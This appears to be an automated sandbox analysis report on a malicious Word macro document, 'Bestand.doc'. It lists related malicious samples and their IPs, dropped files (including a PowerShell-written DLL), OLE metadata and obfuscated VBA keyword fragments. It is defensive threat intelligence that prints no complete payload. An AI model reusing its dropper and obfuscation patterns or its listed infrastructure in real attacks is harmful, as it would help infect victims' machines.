                                        arc-NZY886292.docGet hashmaliciousBrowse
                                        • 5.2.136.90
                                        NQN0244_012021.docGet hashmaliciousBrowse
                                        • 5.2.136.90
                                        4560 2021 UE_9893.docGet hashmaliciousBrowse
                                        • 5.2.136.90
                                        Scan-0767672.docGet hashmaliciousBrowse
                                        • 5.2.136.90
                                        Documento-2021.docGet hashmaliciousBrowse
                                        • 5.2.136.90
                                        informazioni-0501-012021.docGet hashmaliciousBrowse
                                        • 5.2.136.90
                                        rapport 40329241.docGet hashmaliciousBrowse
                                        • 5.2.136.90
                                        info_39534.docGet hashmaliciousBrowse
                                        • 5.2.136.90
                                        Dati_012021_688_89301.docGet hashmaliciousBrowse
                                        • 5.2.136.90
                                        2199212_20210105_160680.docGet hashmaliciousBrowse
                                        • 5.2.136.90
                                        ARCHIVO_FILE.docGet hashmaliciousBrowse
                                        • 5.2.136.90
                                        doc_X_13536.docGet hashmaliciousBrowse
                                        • 5.2.136.90
                                        REP380501 040121.docGet hashmaliciousBrowse
                                        • 5.2.136.90
                                        NETINTERNETNetinternetBilisimTeknolojileriASTRarc-NZY886292.docGet hashmaliciousBrowse
                                        • 89.252.164.58
                                        document-838642002.xlsGet hashmaliciousBrowse
                                        • 91.227.6.25
                                        document-838642002.xlsGet hashmaliciousBrowse
                                        • 91.227.6.25
                                        hesaphareket.exeGet hashmaliciousBrowse
                                        • 93.113.60.67
                                        p4EnaC8ciX.exeGet hashmaliciousBrowse
                                        • 89.43.28.149
                                        PO_#17112020.xlsxGet hashmaliciousBrowse
                                        • 93.113.63.58
                                        PO_#16112020.xlsxGet hashmaliciousBrowse
                                        • 93.113.63.58
                                        d0i44FhH4N.exeGet hashmaliciousBrowse
                                        • 213.238.179.185
                                        p6TKrX8BsM.exeGet hashmaliciousBrowse
                                        • 213.238.179.185
                                        Scan001_09112020.exeGet hashmaliciousBrowse
                                        • 89.43.28.149
                                        BPhcOvPkRQ.exeGet hashmaliciousBrowse
                                        • 93.113.60.67
                                        blJsM74xxM.exeGet hashmaliciousBrowse
                                        • 213.238.179.185
                                        ORDER 20200717-019.exeGet hashmaliciousBrowse
                                        • 95.173.190.12
                                        Purchase Order 1674,pdf.exeGet hashmaliciousBrowse
                                        • 89.43.28.149
                                        lab7_executable2.docGet hashmaliciousBrowse
                                        • 91.227.6.25
                                        https://jetsgmbhcom-my.sharepoint.com:443/:b:/g/personal/g_petrova_jetsgmbh_com/Eflus5lYFHBKhp-a3eq9etsBroqnbi9FaLH1uKjHJLoO3Q?e=4%3amUSYs9&at=9Get hashmaliciousBrowse
                                        • 213.238.181.27
                                        9-212-99177.xlsGet hashmaliciousBrowse
                                        • 95.173.190.227
                                        malware.xlsGet hashmaliciousBrowse
                                        • 213.238.179.232
                                        doc720.xlsGet hashmaliciousBrowse
                                        • 213.238.179.232
                                        Contract_892.xlsGet hashmaliciousBrowse
                                        • 213.238.179.232
                                        ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdINhttps://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwi0xvriv7ztAhVjJaYKHWwTAa4QFjAAegQIBBAC&url=https%3A%2F%2Fomautomation.biz%2F&usg=AOvVaw1teX4l5kJb0V5MEoZePI27Get hashmaliciousBrowse
                                        • 103.83.81.148
                                        Statement of Account.exeGet hashmaliciousBrowse
                                        • 103.83.81.68
                                        GA454NPHTQTHRUPUTLOC2.PDF.exeGet hashmaliciousBrowse
                                        • 103.83.81.68
                                        NEW ORDER REQUEST.exeGet hashmaliciousBrowse
                                        • 103.83.81.68
                                        GA454NPHTQTHRUPUTLOC2.PDF.exeGet hashmaliciousBrowse
                                        • 103.83.81.68
                                        yqgfkacF46F6MMR.exeGet hashmaliciousBrowse
                                        • 103.83.81.68
                                        ID20224011170004382015_REDEMPTION_REKSA DANA BATAVIA DANA LIKUID_pdf.exeGet hashmaliciousBrowse
                                        • 103.83.81.68
                                        TCS.exeGet hashmaliciousBrowse
                                        • 103.83.81.68
                                        IM_Doc_0003520270.PDF.exeGet hashmaliciousBrowse
                                        • 103.83.81.68
                                        TNT Numero.exeGet hashmaliciousBrowse
                                        • 103.83.81.68
                                        Customer Advisory - Telephone Issue November.pdf.exeGet hashmaliciousBrowse
                                        • 103.83.81.68
                                        KvFgUzWPYO.exeGet hashmaliciousBrowse
                                        • 103.129.98.58
                                        pwCW5ejrKx.exeGet hashmaliciousBrowse
                                        • 103.83.81.68
                                        2wayzxxxxxxxxxxxxx.exeGet hashmaliciousBrowse
                                        • 103.83.81.68
                                        n8ziBFsOJ3.exeGet hashmaliciousBrowse
                                        • 103.129.98.58
                                        57NSgaJ5Hk.exeGet hashmaliciousBrowse
                                        • 103.129.98.58
                                        XH9fEeUgK5.exeGet hashmaliciousBrowse
                                        • 103.83.81.68
                                        ES_MSC-20024169(BL DRAFT) .pdf.exeGet hashmaliciousBrowse
                                        • 103.83.81.68
                                        AWB775678FGH456789HVC59-Shipment_INV_pdf.exeGet hashmaliciousBrowse
                                        • 103.83.81.68
                                        HpNZcsvnWY.exeGet hashmaliciousBrowse
                                        • 103.129.98.58
                                        LINODE-APLinodeLLCUS6SRdYNN63E.exeGet hashmaliciousBrowse
                                        • 176.58.123.25
                                        https://doc.clickup.com/p/h/2hm67-99/806f7673f7694a9Get hashmaliciousBrowse
                                        • 45.79.77.20
                                        https://farmetal.org/ofc3Get hashmaliciousBrowse
                                        • 45.79.77.20
                                        https://www.solarwinds.com/systems-management-bundle/registration?CMP=BIZ-EDM-520-SW_NA_X_RR_PPD_LD_EN_SYSMBG_X-XSYS-REG-2020Get hashmaliciousBrowse
                                        • 45.33.3.7
                                        7mB0FoVcSn.exeGet hashmaliciousBrowse
                                        • 192.155.90.90
                                        xLH4kwOjXR.exeGet hashmaliciousBrowse
                                        • 172.105.196.152
                                        DfES2eBy48.exeGet hashmaliciousBrowse
                                        • 172.105.196.152
                                        56HTe9n3fI.exeGet hashmaliciousBrowse
                                        • 172.105.196.152
                                        eyorp69bxO.exeGet hashmaliciousBrowse
                                        • 172.105.196.152
                                        d2Hh2e62ZG.exeGet hashmaliciousBrowse
                                        • 80.85.84.72
                                        utox.exeGet hashmaliciousBrowse
                                        • 178.79.169.204
                                        3965.dllGet hashmaliciousBrowse
                                        • 172.105.126.54
                                        Statement_1472621419.xlsGet hashmaliciousBrowse
                                        • 172.105.126.54
                                        Statement_1472621419.xlsGet hashmaliciousBrowse
                                        • 172.105.126.54
                                        Statement_1472621419.xlsGet hashmaliciousBrowse
                                        • 172.105.126.54
                                        SecuriteInfo.com.VB.Heur.EmoDldr.32.A0B4C65C.Gen.18253.docGet hashmaliciousBrowse
                                        • 23.92.21.99
                                        SecuriteInfo.com.VB.Heur.EmoDldr.32.A0B4C65C.Gen.18253.docGet hashmaliciousBrowse
                                        • 23.92.21.99
                                        SecuriteInfo.com.VB.Heur.EmoDldr.32.9BF70318.Gen.10729.docGet hashmaliciousBrowse
                                        • 23.92.21.99
                                        SecuriteInfo.com.VB.Heur.EmoDldr.32.A0B4C65C.Gen.18253.docGet hashmaliciousBrowse
                                        • 23.92.21.99
                                        SecuriteInfo.com.VB.Heur.EmoDldr.32.9BF70318.Gen.10729.docGet hashmaliciousBrowse
                                        • 23.92.21.99

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B0EF2ED-537D-406E-B057-1B1541B1D39D}.tmp
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1024
                                        Entropy (8bit):0.05390218305374581
                                        Encrypted:false
                                        SSDEEP:3:ol3lYdn:4Wn
                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                        Malicious:false
                                        Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):46
                                        Entropy (8bit):1.0424600748477153
                                        Encrypted:false
                                        SSDEEP:3:/lbWwWl:sZ
                                        MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                                        SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                                        SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                                        SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                                        Malicious:false
                                        Preview: ........................................user.
                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Bestand.LNK
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Fri Jan 8 01:35:35 2021, length=171008, window=hide
                                        Category:dropped
                                        Size (bytes):1994
                                        Entropy (8bit):4.5245071903649485
                                        Encrypted:false
                                        SSDEEP:48:81/XT0jFPNHsHRFQfQh21/XT0jFPNHsHRFQfQ/:81/XojFxsXQfQh21/XojFxsXQfQ/
                                        MD5:3E9F0F87D8B31070B39E2755FBF0A3C5
                                        SHA1:2DB1EDA1104A69FB283E1681C32B552E22EEA3FD
                                        SHA-256:708FFE01FFA85316F7E0B238F1A2479CED34796F19DF08946C9A7ECAB06C73C7
                                        SHA-512:177903C85DED6CC24DED8631AEDAADBB9B598FF3D2E964C512F77969B9F4453C6298F4F7B305394A290DFDF9BA8DD1A5B079688185C89890DEFF4088D021E2FF
                                        Malicious:false
                                        Preview: L..................F.... ...lV...{..lV...{..0...f................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....^.2.....(Rr. .Bestand.doc.D.......Q.y.Q.y*...8.....................B.e.s.t.a.n.d...d.o.c.......u...............-...8...[............?J......C:\Users\..#...................\\305090\Users.user\Desktop\Bestand.doc.".....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.B.e.s.t.a.n.d...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......305090..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[....L..
                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):59
                                        Entropy (8bit):4.18963336378096
                                        Encrypted:false
                                        SSDEEP:3:M19iBd5o/8Bd5omX19iBd5ov:Me30Q3o3y
                                        MD5:5A1F1D8C9E6C6E24A01B52F5F2834005
                                        SHA1:5670FB6B5EA66B2BF15329B232C1628566625A92
                                        SHA-256:9D3FAE6D0BDDB4CFC66E3542A4B42782E352C0A5F1BDB1999CCC5C59B9BCFC68
                                        SHA-512:4241841EC27D9BFB5C4FD75ECCA5B343B4ED633D253F198EE74B71BF40C77975088DF8AC0B80D47BA363B789E1C04A0A51737C310281D2DBB853FB1219C7C6DD
                                        Malicious:false
                                        Preview: [doc]..Bestand.LNK=0..Bestand.LNK=0..[doc]..Bestand.LNK=0..
                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):162
                                        Entropy (8bit):2.431160061181642
                                        Encrypted:false
                                        SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                        MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                        SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                        SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                        SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                        Malicious:false
                                        Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T34CJE67ZJGLFSV18T6Q.temp
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):8016
                                        Entropy (8bit):3.5829617355044774
                                        Encrypted:false
                                        SSDEEP:96:chQCsMqbqvsqvJCwolz8hQCsMqbqvsEHyqvJCwor/zvlYkHyf8OzlUVrIu:cy+olz8yWHnor/zvWf8OgIu
                                        MD5:1A838ABB3A40279F383AB1C21E56F683
                                        SHA1:27A1DA6BA86FA744C3CC8F3D2FFFDBEC7CFFD703
                                        SHA-256:5A663A1A8212AA670A701C2822949796FCAAC0AADC313CCD72E8AB09820FD5F3
                                        SHA-512:9DD9559A026717565F7ABDCD3169DF241EC33534B04F2E0A59499833481648CEBE7DCC61ECD6AF3ED45CF04EB152F5F07DB211D253AC4EACB85A960AC62DAF8B
                                        Malicious:false
                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                        C:\Users\user\Desktop\~$estand.doc
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):162
                                        Entropy (8bit):2.431160061181642
                                        Encrypted:false
                                        SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                        MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                        SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                        SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                        SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                        Malicious:false
                                        Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                        C:\Users\user\Lqpw_5i\F4w0osc\R95F.dll
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):199626
                                        Entropy (8bit):7.481670588286676
                                        Encrypted:false
                                        SSDEEP:3072:hwbpDnn9FRrNyVBYF0n3ajFq4weCp2S2MJdhzybMO8dSySA:hsl9FpaBYF0nVp2MJHybR8dS9
                                        MD5:1C6DB931E1A9E52F74433510909ED133
                                        SHA1:B8D72335A962827DD6DB2912ECF0FC6DC56AABD8
                                        SHA-256:A39809D9A9B1DA262E89F785721DB56192DE84327342F98463761F30E17B5A52
                                        SHA-512:95B77C343A49F7F95FC47D0B3C5D66A78EA6BF1DE61BBC2492EF741E026DC4FDEC39B9BB071F5FBD524D85324D3B3171A33513BD1DB914CD7EB7E6E38CF6B974
                                        Malicious:false
                                        Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.

                                        Static File Info

                                        General

                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: didactic Intelligent system Incredible Wooden Sausages Developer Practical Plastic Cheese port Awesome Fresh Chicken Maine, Author: Kylian Paul, Template: Normal.dotm, Last Saved By: Clara Menard, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 5 14:23:00 2021, Last Saved Time/Date: Tue Jan 5 14:24:00 2021, Number of Pages: 1, Number of Words: 2604, Number of Characters: 14849, Security: 8
                                        Entropy (8bit):6.692610588134994
                                        TrID:
                                        • Microsoft Word document (32009/1) 79.99%
                                        • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                        File name:Bestand.doc
                                        File size:170140
                                        MD5:64553aae596a4b3177964c3bac7502eb
                                        SHA1:9cdaf9d3f8dc72d15055fb5ca20fc0dd79b438ff
                                        SHA256:05ec62e5c17cce0faee1f6e791180a7104de6a277f0a3981a65ad43286b5854f
                                        SHA512:2632df66c05351acc150776c8841adc20ab56105297e233b29982b4320f2ab9627bdc25bd6177c2d8fa9773da195d9fa5211779c5dfcea575cba96d813fbb8bd
                                        SSDEEP:3072:WIs9ufstRUUKSns8T00JSHUgteMJ8qMD7gYrIXJ:u9ufsfgIf0pL3XJ
                                        File Content Preview:........................>......................................................................................................................................................................................................................................

                                        File Icon

                                        Icon Hash:e4eea2aaa4b4b4a4

                                        Static OLE Info

                                        General

                                        Document Type:OLE
                                        Number of OLE Files:1

                                        OLE File "Bestand.doc"

                                        Indicators

                                        Has Summary Info:True
                                        Application Name:Microsoft Office Word
                                        Encrypted Document:False
                                        Contains Word Document Stream:True
                                        Contains Workbook/Book Stream:False
                                        Contains PowerPoint Document Stream:False
                                        Contains Visio Document Stream:False
                                        Contains ObjectPool Stream:
                                        Flash Objects Count:
                                        Contains VBA Macros:True

                                        Summary

                                        Code Page:1252
                                        Title:
                                        Subject:didactic Intelligent system Incredible Wooden Sausages Developer Practical Plastic Cheese port Awesome Fresh Chicken Maine
                                        Author:Kylian Paul
                                        Keywords:
                                        Comments:
                                        Template:Normal.dotm
                                        Last Saved By:Clara Menard
                                        Revion Number:1
                                        Total Edit Time:0
                                        Create Time:2021-01-05 14:23:00
                                        Last Saved Time:2021-01-05 14:24:00
                                        Number of Pages:1
                                        Number of Words:2604
                                        Number of Characters:14849
                                        Creating Application:Microsoft Office Word
                                        Security:8

                                        Document Summary

                                        Document Code Page:-535
                                        Number of Lines:123
                                        Number of Paragraphs:34
                                        Thumbnail Scaling Desired:False
                                        Company:
                                        Contains Dirty Links:False
                                        Shared Document:False
                                        Changed Hyperlinks:False
                                        Application Version:917504

                                        Streams with VBA

                                        VBA File Name: A81c_pcot0t3c8, Stream Size: 17941
                                        General
                                        Stream Path:Macros/VBA/A81c_pcot0t3c8
                                        VBA File Name:A81c_pcot0t3c8
                                        Stream Size:17941
                                        Data ASCII:. . . . . . . . . | . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Data Raw:01 16 01 00 00 f0 00 00 00 7c 06 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 83 06 00 00 93 30 00 00 00 00 00 00 01 00 00 00 e9 f2 15 2a 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                        VBA Code Keywords

                                        Keyword
                                        chutdOAFs
                                        "nbBVBbrmTJhR"
                                        uSvkK
                                        TjDNNFkVD
                                        Object
                                        "DTeWBCeIuXcgIDGC"
                                        TmGkDL.CreateTextFile("LhykJB:\jTdNFUJ\PnxpBEA.YspSlC")
                                        "mMpvHwuBnnrqGyIFq"
                                        hQCyFzF.WriteLine
                                        ncXeGEGfF
                                        AFnzJ
                                        ArkJEKEEH
                                        RJCEFJhC
                                        Nothing
                                        "AfSXEBzJIIxvQmJC"
                                        "NkEpBgFHAsWaxHT"
                                        hgvZG.WriteLine
                                        fdLCFDmF.WriteLine
                                        mbDbF
                                        WcDDCTDnI
                                        "YfIwYFFntmmdDsPv"
                                        bcUFD
                                        XJUEA
                                        "tZZjtwJRCQcVAD"
                                        tfgmN.Close
                                        "TwoNCIGurJPYA"
                                        "QsixYFOXyEEAmh"
                                        WiXswI
                                        "GqSFCtOyDYdfx"
                                        TjDNNFkVD.CreateTextFile("JYXoyLAMu:\EFBhEtGsQ\owfrHBHf.anGOrJLhY")
                                        ZZzrG
                                        UgnVAHcRD
                                        yHxgEeJg:
                                        bcUFD:
                                        eLNGd:
                                        kcuElHl
                                        UaCEJEERD.Close
                                        TOXmCsgb.Close
                                        PuAVBFFM
                                        bcUFD.WriteLine
                                        JkICEEJbA
                                        dwJWfYEzQ
                                        tfgmN:
                                        yHxgEeJg.Close
                                        hgvZG:
                                        FrVPCyW
                                        GEopA
                                        tIaWTAJA
                                        PdhtG
                                        ZQkkGq
                                        cVkLD
                                        LXJdHABRP
                                        eRxrHHEBB
                                        hKjoxAHI
                                        IYlnG
                                        tNngtUo
                                        UaCEJEERD.WriteLine
                                        RJCEFJhC.Close
                                        eLNGd.WriteLine
                                        "MJtNyEaooLCJCF"
                                        "JNHUAINVrwxEKEHD"
                                        rINmB
                                        ZYnQf:
                                        "ehJSnoaWvoCEfGL"
                                        vsASGFtA
                                        KTDSIL.CreateTextFile("VdGtFIE:\SzlumIC\CndNBJiEG.WAxLRDDC")
                                        "YIyOHHHeDXloKIBE"
                                        NHymnJzG:
                                        sewLMSSJg
                                        KzJMOvqoA
                                        ZYnQf.WriteLine
                                        "RMNuAAEfwmHGkp"
                                        sPUjHbDB.WriteLine
                                        "eKjGCADVsuMVfjHhDc"
                                        eHrGyvyM
                                        GUUgA.CreateTextFile("gDyoIzGDe:\zHPnE\SlHrCGBaB.xpVdXbCuJ")
                                        xDUMl
                                        noyuzC
                                        fqoDE
                                        Resume
                                        "cWptEtSbgvWCAD"
                                        TiWkS
                                        JJetH
                                        buKzFt
                                        qdDeFbDk
                                        "]an"
                                        "CljNpAVDuUTJuHv"
                                        MeLoxDCJT
                                        KTDSIL
                                        GzGtFB
                                        KFlvRoHB
                                        UaCEJEERD:
                                        UnVnjA
                                        aCXYJWIHA
                                        ApdWADYGV
                                        hKDFekFGF
                                        pzqeBGIAH
                                        pGLWAAGJ
                                        ZEetCEyLC
                                        WOdrGBJG
                                        zetDIDBDI
                                        sPUjHbDB:
                                        rfIxFdkBE.WriteLine
                                        "QxWCtMBxGzkkBAU"
                                        NHymnJzG.Close
                                        fMPBmQ
                                        "QkKSDHgSXaAA"
                                        Eyshwbjqie_zkc
                                        yHxgEeJg
                                        SYgbDdCEH
                                        "QCgbCFzJiDJUEIHES"
                                        "RmlAGEzIZqLPNdIDj"
                                        NPOhCPGF
                                        gxwmz
                                        NHymnJzG
                                        TOXmCsgb
                                        tfgmN.WriteLine
                                        hlEyDCTAH
                                        yHxgEeJg.WriteLine
                                        sbLwDeWJ
                                        sPUjHbDB.Close
                                        hQCyFzF.Close
                                        "lSOfQyhpoF"
                                        UjlQFBJj
                                        cTUpB
                                        IfdcD
                                        VB_Name
                                        eLNGd.Close
                                        UjlQFBJj.CreateTextFile("zGzGFMUJD:\QkpIYHOrc\FwQpsJ.ddKnHUJB")
                                        buKzFt.CreateTextFile("sucQc:\iYsaHyNC\NiIqHAH.mTesbI")
                                        eDbUAXI
                                        TptSCH
                                        XSlyHJ
                                        "EXrpEHndyyG"
                                        TbHJC
                                        "RVkNwtRXUzC"
                                        JjBKEUXqH
                                        TptSCH.CreateTextFile("MqoMRwwIg:\gqqsLDE\cFTTPq.jfZyU")
                                        VNhJZVCB
                                        "uAYnHfspvFJ"
                                        Mid(Application.Name,
                                        deuxb
                                        sPUjHbDB
                                        "HNkPCvHSVKIC"
                                        EcBqJBVE
                                        "jyJEJqDCTEnyIA"
                                        hgvZG.Close
                                        naqcFCA
                                        xZGeAsHP
                                        FijxC
                                        hrqzdCF
                                        uwCSCCEO
                                        MeLoxDCJT.CreateTextFile("VixyO:\QYvZJLAY\DkDtKB.ACnqoxJ")
                                        "qsYNSviAFUkyhFd"
                                        tNvqYU
                                        "lkkOeHeJHjmGONABFI"
                                        gJsfsb
                                        fxJTHGJF
                                        JJetH.Close
                                        XhUYUbSBA
                                        IuDSasFIm
                                        bcUFD.Close
                                        BuEcDJvc
                                        NHymnJzG.WriteLine
                                        QAhNFQ
                                        tfgmN
                                        VWiBw
                                        UaCEJEERD
                                        TiWkS.CreateTextFile("JhEjHJH:\heHcF\xIjwBCI.IWEODGR")
                                        ixuyHGriH
                                        iOplaUSwB
                                        TFPJDBSa
                                        eRxrHHEBB:
                                        rfIxFdkBE.Close
                                        TmGkDL
                                        LUJoKCCQ
                                        uwCSCCEO.WriteLine
                                        "rWCJIFDWVfATR"
                                        ZYnQf
                                        "txLTFDcUtlBJi"
                                        LBFSC
                                        PkQhSAw
                                        eLNGd
                                        EjrLDNGq
                                        ApdWADYGV.Close
                                        ZYnQf.Close
                                        LqqhhpAQ
                                        eTBBLHXwx
                                        msoKFIIMI
                                        "WVtJEvzwejAL"
                                        ApdWADYGV:
                                        "]anw["
                                        sHovtYJn
                                        kIALACE
                                        HjcgHbA
                                        vkAhEABKZ
                                        PzSZDA
                                        eBvGf
                                        JJetH:
                                        "pIHMJANYJmFIe"
                                        eRxrHHEBB.WriteLine
                                        "AdLOPbWTXOCCRm"
                                        oTwTJAJ
                                        WcDDCTDnI.CreateTextFile("MRDYFoGGc:\LGsvZeCE\WxUJACHB.KjAkiD")
                                        "GuEmEfvZLaJDIAX"
                                        "UqiKuFLuUFAG"
                                        ClgfEDCg
                                        "yfwQBHQfgeJbFJB"
                                        GPfHF
                                        "GApbBIepzWxnI"
                                        hQCyFzF
                                        "zDOlFEIFBVWkPbIC"
                                        rfIxFdkBE:
                                        "hDlEFEcAPqOXZqg"
                                        ApdWADYGV.WriteLine
                                        bwdNxC
                                        AUZLIjCLH
                                        "zErBUYAGeMPaGBPDC"
                                        "xaOQJbzFVCXtJADD"
                                        "hWxuzXUxYdWuBHC"
                                        WqyIx.CreateTextFile("ylDMcFB:\AAOOMAKJq\xwBWuI.IOYsGSuDB")
                                        TOXmCsgb.WriteLine
                                        ODgRUaAId
                                        bzYfQcEHB
                                        "ufltvttBnHJNx"
                                        qhuKHDC
                                        NctjGT
                                        hQCyFzF:
                                        uwCSCCEO.Close
                                        PRsSHBf
                                        YBonG
                                        "xfhECJccxFyA"
                                        yKTqX
                                        ImZpAHpaF
                                        "RmgSBGJYhhoQDxVIT"
                                        QCDEyAHw
                                        "aekFkFuGVeluWCH"
                                        uLRAyCA
                                        vKdAbBHGq
                                        uvgvJGfI
                                        PvcTcFOF
                                        bYwGEijH
                                        zetDIDBDI.CreateTextFile("ayAqsH:\opXXFq\UykoCNloH.lEEiEJlG")
                                        "wOTiEDqNZtWN"
                                        msoKFIIMI.CreateTextFile("SQhZmTV:\ITZNAskG\hSsqo.sNJcmiGF")
                                        WqyIx
